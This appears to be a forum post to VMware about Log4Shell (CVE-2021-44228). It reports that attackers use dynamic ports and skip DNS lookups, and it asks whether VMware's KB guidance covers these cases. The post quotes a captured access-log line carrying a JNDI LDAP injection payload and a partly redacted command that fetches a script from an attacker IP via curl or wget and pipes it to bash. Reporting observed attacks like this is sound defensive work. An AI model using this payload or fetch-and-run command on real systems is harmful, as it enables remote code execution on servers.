CVE-2021-44228 Regarding https://www.vmware.com/security/advisories/VMSA-2021-0028.html CVE-2021-44228 Please be aware that attackers are targeting servers also without DNS resolution. 45.155....
See more...
CVE-2021-44228 Regarding https://www.vmware.com/security/advisories/VMSA-2021-0028.html CVE-2021-44228 Please be aware that attackers are targeting servers also without DNS resolution. 45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KG(cut_for_security)}" Command that is send to systems: (curl -s 45.155.205.233:5874/(ip_cut_for_security):80||wget -q -O- 45.155.205.233:5874/(ip_cut_for_security):80)|bash On Vmware KB: https://kb.vmware.com/s/article/87086 - vmware is refering to traffic that comes on LDAP port, but as you can see above attackers are using dynamic ports to actually preform that attack. And also they are not using DNS for lookups in 40/60 cases. Please verify if that is consistent with your KB and protection. Thanks. Chris
